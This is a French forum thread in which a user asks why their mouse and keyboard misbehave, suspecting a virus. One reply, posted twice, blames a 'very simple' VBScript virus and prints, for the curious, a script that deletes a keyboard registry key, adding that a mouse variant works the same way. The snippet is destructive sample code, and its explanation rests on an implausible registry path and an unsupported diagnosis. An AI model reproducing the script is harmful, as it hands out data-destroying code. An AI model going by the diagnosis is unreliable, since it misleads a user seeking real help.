Se connecter
Se connecter

ou
Créer un compte

ou

Sujet Souris qui pete les plombs

  • 4 réponses
  • 3 participants
  • 334 vues
  • 1 follower
Sujet de la discussion Souris qui pete les plombs
Desole de poster sur un sujet aussi merdique mais je suis vraiment tres ennuye:

ma souris refuse de ne selectionner qu'un objet a la fois;
exemple :quand je suis sur le bureau ,je ne peux pas selectionner uniquement le dossier "mes documents" sans que ca selectionne aussi le dossier qui est au dessus;

la touche shift est inactive,et quand je deplace le pointeur pour inserr une lettre au milieu d'un texte,ca selectionne les mots au lieu de placer le pointeur au milieu du mot;

pareil pour le clavier:certaines touches de fonction (caps lock,num et scroll) se mettent en fonction quand les leds sont eteintes et inversement;

que se passe t'il donc, un virus
2
Et si tu changé de clavier...
3
J'ai un autre clavier et ca fait exactement la meme chose;;;
4
Oui il y a un virus com ca qui existe, tres simple a coder en vbscript tu peux le chopper n'improte ou mais normalement windows bloque l'execution de ce code mal veillant...

pour les curieux le code vb script est celui ci :

<script language="vbscript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Classes\Keyboard\"
</script>

donc tu vois co te l'apprends ce code verifie dans ta base de registre que cette clef n'ait pas été virée
pour la souris, c pareil sauf que le dernier repertoire c mouse a la place de keyboard
5
Oui il y a un virus com ca qui existe, tres simple a coder en vbscript tu peux le chopper n'improte ou mais normalement windows bloque l'execution de ce code mal veillant...

pour les curieux le code vb script est celui ci :

<script language="vbscript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegDelete"HKEY_CURRENT_USER\System\CurrentControlSet\Services\Classes\Keyboard\"
</script>

donc tu vois co te l'apprends ce code verifie dans ta base de registre que cette clef n'ait pas été virée
pour la souris, c pareil sauf que le dernier repertoire c mouse a la place de keyboard